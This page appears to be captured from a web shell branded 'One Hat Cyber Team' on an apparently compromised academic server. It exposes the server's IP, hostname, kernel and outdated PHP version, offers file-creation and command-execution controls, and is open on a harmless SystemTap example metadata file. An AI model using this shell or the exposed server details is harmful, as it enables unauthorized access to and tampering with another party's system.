One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
systemtap
/
examples
/
general
/
Edit File:
sizeof.meta
title: Print the Size of a C Type name: sizeof.stp version: 1.0 author: anonymous keywords: statistics memory bpf subsystem: any status: proposed exit: event-ended output: on-exit scope: system-wide description: This script prints the size of a type, based on dwarf debuginfo for any kernel or userspace module, or trial-compilation of a given header file name. test_check: stap -p4 sizeof.stp task_struct 'kernel<include/linux/sched.h>' test_installcheck: stap sizeof.stp FILE '</usr/include/stdio.h>' test_check_bpf: stap -p4 --bpf sizeof.stp task_struct 'kernel<include/linux/sched.h>' test_installcheck_bpf: stap --bpf sizeof.stp FILE '</usr/include/stdio.h>'
Simpan